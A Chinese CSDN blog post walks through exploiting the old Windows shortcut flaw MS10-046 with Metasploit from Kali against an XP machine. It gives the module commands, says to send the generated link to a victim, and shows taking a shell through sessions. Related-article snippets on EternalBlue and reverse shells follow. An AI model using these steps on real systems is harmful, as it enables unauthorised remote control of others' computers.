Kali点击一下就能中招!

最新推荐文章于 2022-04-20 23:59:09 发布
最新推荐文章于 2022-04-20 23:59:09 发布
阅读量308 收藏 2
点赞数
分类专栏: 安全领域
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xphouziyu/article/details/89062691
版权

实验背景

攻击者:kali linux
受害者:xp系统
使用漏洞:ms10_046
windows安全中心地址: https://docs.microsoft.com/zh-cn/security-updates/

更新msf

kali‘是一个软件更新很快的系统,每当你要使用你的kali的时候,要干的第一件事情就是更新你的kali。

apt-get update
.....
apt-get upgrade
.....
如果报错
apt-get upgrade --fix-missing

如果开msf的时候没有连接上数据库

service postgresql start 
service metasplot start
db_status

假如没有成功就输入 msfdb init,重复上面的并重启。
如果还是不行就再重复上面的步骤。

开攻

第一步

打开kali
然后打开软件 metasplotfromwork ,就是那个小盾牌一样的软件
在这里插入图片描述
然后再连接数据库后再终端搜索 ms10_046
在这里插入图片描述

msf5> search ms10_046

在这里插入图片描述接着使用这个模块

在这里插入图片描述
然后配置这个模块

show options

上面的命令可以知道我们要设置哪些选项
ms10_046这个模块设置比较简单,只需要设置好自己的地址和使用的端口
因为我使用的内网环境,所以这里设置比较简单

set SRVHOST 192.168.212.153

设置好后就可以开始了

exploit

输入命令行后会生成一个连接,将这个连接发个受害者,然后只要受害这电脑有ms10_064这个漏洞,它点开就会被控制。

第二步

受害者中招后,我们就可以输入 sessions -l查看
在这里插入图片描述

确定中招后,就可以通过 sessions -i 加ID 来连接对方
然后shell打开对方终端,剩下的就凭你高兴了。。。。。

看文字不懂的可以再B站搜索用户“夜明二”,那里会后视频。

夜明二
关注
专栏目录
利用MS10-046漏洞攻击win7操作系统
afei001
03-27 2651
MS10-046简介     MS10-046是一个文件快捷方式漏洞,能利用这个漏洞提权直接获取到shell。 利用MS10-064攻击win7获取shell 实验环境: 攻击机:kali 靶机:win7-x86_64 1.开启kali和win7 2.kali中启动MSF找到MS10-046模块 root@kali:~# msfconsole #启动MSF ...
[系统安全] 二十六.WannaCry勒索病毒分析 (2)MS17-010漏洞利用及蠕虫解析
杨秀璋的专栏
03-01 8633
作者前文采用Github资源实现永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
nextcloud折腾笔记
chn_sdn的博客
08-13 8057
网上有人说用oneinstack会比lnmp更方便设置php,还包括lnmp功能。没试过,有兴趣的可以试试。 一、环境:centos7、php7、lnmp1.5、nextcloud13、1.0cpu+1G内存 二、方案 nextcloud+oss+ecs(阿里云,参考ossfs帮助) 三、安全问题修复见(杰哥) 四、添加nextcloud网站根目录(详细参考lnmp网站),设置好ssl证书...
小白搭建nextcloud
夜明二
02-19 2919
文章目录环境说明安装 Nginx配置 epel 源安装安装PHP添加php的源安装PHP及必要扩展配置php-fpm安装数据库注意数据库版本安装mariadb配置mariadb初始化数据库(方法一)直接改密码懒得初始化(方法二)为服务创建数据库和授权用户创建数据库创建授权用户配置SSL证书创建整数目录自己生成证书下载安装nextcloud下载原文件配置网站空间配置网站nginx虚拟环境修改ngni...
内网渗透-项目六外围打点
qq_50643984的博客
03-18 2348
1.外围打点 1.1拓补图 1.2发现主机 arp-scan -l 可以发现目标ip为192.168.31.138,nmap扫描端口,接下来绑定hosts域名,访问目标网站。 nmap -p- -sC -sV -O 192.168.31.138 -oA ip_port 注:-p为指定端口,可以先用masscan扫描开发端口,再用nmap。 绑定hosts,目标域名是www.webhack123.com vim /etc/hosts 直接按照图中添加就可以了。 1.3网站目录扫描 打开网站发现没有什
Kali Linux快速打开终端快捷键
zmz971751504的博客
09-27 3万+
kali Linux 是没有像Ubuntu一样的Ctrl+Alt+T打开终端的快捷方式的,所以我们可以自己设置我们喜欢的快捷方式。 在Kali下, 打开控制中心的代码:gnome-control-center 打开终端的代码:gnome-terminal 在设置中心里,选择键盘(keyboard),在选择快捷键(shortcut),拉到最下面有一个小小的加号,点击它 就可以自己设置快捷键
Kali Linux:用永恒之蓝对 Windows 7 进行渗透并揭密勒索病毒攻击方法
GitChat
02-05 5784
提示:本文章内所有内容环境为自己搭建绝无违法内容,请不要利用其中的技术来做违法的事情。 声明:法律问题与本作者无关,请自觉遵守! 实施利用 Kali Linux 对 Windows7 SP1 进行永恒之蓝操作,所以操作将在虚拟机上完成。...
网络渗透学习笔记
weixin_45753182的博客
04-20 2792
内网环境配置 域 不同域之间的访问称为跨域访问 信任是可以传递的 为域控win2008配置静态ip,cmd中输入ncpa.cpl.配置完后,在cmd中输入dcpromo 创建dns是为了解析域名 win7 配置服务器就行 此时可以ping通域控 命令:清空dns缓存的 win2008中配好后的 有注册的记录 win7加入了cxh.com域 在win7中登录win2008域控主机,win2008主机就自动关机了 问题: ...
[网络安全自学篇] 六十八.WannaCry勒索病毒复现及分析(二)MS17-010利用及病毒解析
杨秀璋的专栏
04-20 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了通过Python利用永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
[网络安全自学篇] 七十三.WannaCry勒索病毒复现及分析(四)蠕虫传播机制全网源码详细解读
杨秀璋的专栏
05-05 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了逆向分析OllyDbg动态调试工具的基本用法,包括界面介绍、常用快捷键和TraceMe案例分析。这篇文章将继续详细讲解WannaCry蠕虫的传播机制,带领大家详细阅读源代码,分享WannaCry勒索病毒是如何传播感染的。作者分析该病毒一个月,一方面觉得自己技术菜,另一方面深知系统安全需要坚持,继续加油。希望文章对您有所帮助~
kali linux系统中文乱码问题的解决
jmp esp
07-11 3万+
echo $LANG发现是有UTF-8的,但是系统中文依然是乱码,猜测问题可能是字体不支持中文(apt-get upgrade之后的后遗症)LANG=en_US.UTF-8 apt-get install ttf-wqy-microhei ttf-wqy-zenhei xfonts-wqy gnome-tweak-tool选中font,然后将所有的font都改成我们刚刚下载的文泉驿的字体,一般是在最
Kali密码攻击之离线攻击工具(二)
miao_9的博客
04-09 3821
Kali密码攻击之离线攻击工具(二)1 Ophcrack彩虹表windows密码哈市破解工具,对应有命令行版的ophcrack-cli2 PyritPyrit是一款无线网络密码破解工具,借助GPU加速,可以让WAP2密码破解更效率。 使用analyze检查抓到的包:pyrit -r xxx.cap annlyze开始解包(单纯字典):pyrit -r xxx.cap -i yyy.dic -b s
Linux下修改字符集
热门推荐
cyuyan的专栏
06-12 10万+
Linux下修改字符集locale -a 查询系统支持的字符集 export LANG=zh_CN.gbk设定字符集 一般来说要设置 Linux 系统的环境变量只需要在 /etc/profile (全局) 或者 ~/.bashrc (单个用户) 即可。但 是对于 LANG 变量来说,有时候你即使在所有这些初始化脚本里面 export 过了,LANG 的值还是纹丝不动
如何用内网虚拟机kali实现反弹shell
qq_44657899的博客
05-23 9787
文章目录实验环境设置端口转发反弹shell验证为什么要反弹shell? 这里我讲述的是NAT模式下的反弹shell,因为个人感觉NAT模式方便一点。 实验环境 攻击机:kali虚拟机(位于内网) ip:192.168.77.128 宿主机:win10(位于外网) ip:10.8.163.224 受害端:centos-7 设置端口转发 虚拟机集群此时相当于在内网中,而要实现反弹shell,我们的受害端centos7必须要能够连接我们的虚拟机kali。可以通过端口转发的功能来实现,比如我
ssrf漏洞内网渗透_CVE20188174漏洞复现及内网渗透攻击
weixin_39907922的博客
12-01 646
本文涉及的知识点:CVE-2018-8174漏洞复现、内网渗透、权限维持、脚本编程、痕迹清除、端口转发、利用MS17-010提权CVE-2018-8174漏洞简介CVE-2018-8174是 Windows VBScript Engine 代码执行漏洞。由于VBScript脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件...
谷安kali密码破解小结(crunch字典生成)
含笑
04-28 2万+
密码破解基本有三种方法:第一种是人工猜解(垃圾桶工程和被动信息收集); 第二种是基于字典暴力破解(主流) 在kali里,是默认自带了字典的,分别放在下面三个文件中:/usr/share/wordlist /usr/share/wfuzz/wordlist /usr/share/seclists,有一个password 第三种是键盘空间字符爆破 全键盘空间字符 部分键盘空间字符
Kali渗透测试之服务扫描1——banner捕获、服务识别、操作系统识别
浅浅的博客
05-05 6314
我们不能简单地通过端口号来识别端口上运行的应用,因此可以通过服务扫描来进行识别,从而有针对性地找到它的利用代码或者发现它的漏洞以及利用方法。本篇除了讲解如何识别端口所对应的服务,还会讲解如何识别目标操作系统。不同的操作系统自带的服务上面也会存在一些漏洞,因此我们可以利用漏洞的弱点直接取得目标系统的管理权,或者取得它的用户权限,然后在用户权限的基础之上进行本地提权,拿到它的管理员权...
Linux设置支持中文UTF8字符集
wangtingting_100的博客
06-12 9542
背景:日志中中文乱码问题1、sudo su2、locale -a3、locale-gen zh_CN.UTF-84、locale -a
kali 网桥模式 不能上网
最新发布
09-06
Kali是一款强大的操作系统,但是网桥模式无法上网可能是由于一些常见的问题导致的。以下是可能的原因和解决方法: 1. 网络设置问题:首先,确保网络连接正常。可以尝试重启网络设备和计算机,确认网络线连接正常,以及路由器或交换机是否允许网桥模式。 2. IP地址和网关设置问题:在网桥模式下,可能需要手动设置IP地址和网关。确保Kali操作系统中的IP地址和网关与网络相匹配。可以查看网络设置并手动配置正确的IP地址和网关。 3. DNS问题:网络连接可能无法解析域名,导致无法上网。请验证DNS服务器设置是否正确。可以尝试更改为Google公共DNS(8.8.8.8和8.8.4.4)并测试连接是否正常。 4. 防火墙设置:防火墙可能会阻止Kali操作系统上网。请检查防火墙设置并确保允许Kali操作系统的上网访问。 5. 虚拟机网络设置问题:如果是在虚拟机中运行Kali,可能需要检查虚拟机软件的网络设置。确保网桥模式已正确配置,并且虚拟网络适配器的设置没有问题。 如果按照以上方法检查后,Kali仍然无法通过网桥模式上网,那有可能是其他更特殊的问题导致。可以尝试在各种技术论坛或社区中搜索相关问题,找到更针对性的解决方法,或者尝试使用其他网络连接方式来解决上网问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值